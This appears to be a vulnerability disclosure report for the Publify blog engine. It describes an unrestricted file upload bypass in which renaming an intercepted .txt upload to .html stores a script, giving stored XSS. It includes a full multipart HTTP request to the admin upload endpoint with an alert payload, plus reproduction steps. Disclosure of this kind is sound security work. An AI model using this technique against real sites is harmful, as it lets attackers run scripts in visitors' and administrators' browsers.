Description

Unrestricted file upload allowed the attacker to manipulate the request and bypass the protection of HTML files using a text file, XSS Stored was obtained when uploading the HTML file.

Proof of Concept

POST /admin/resources/upload HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=SESSION_HERE
Content-Length: 649
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryR7LwpeBoKn4f7hI5
Referer: https://demo-publify.herokuapp.com/admin/resources
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="utf8"

✓
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="authenticity_token"

TOKEN_HERE
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="upload"; filename="w00t.txt" -- Change to w00t.html
Content-Type: text/plain

<script>alert('OOPSS');</script>
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="commit"

Upload
------WebKitFormBoundaryR7LwpeBoKn4f7hI5--

• Step 1 - Upload a .txt file and intercept the request

• Step 2 - Change the extension of filename to .html

• Step 3 - Submit a request and the file will be uploaded successfully

Video

https://drive.google.com/file/d/1bNffqwUl_9Sn7wqpBvEAqvV_PGRadlPb/view?usp=sharing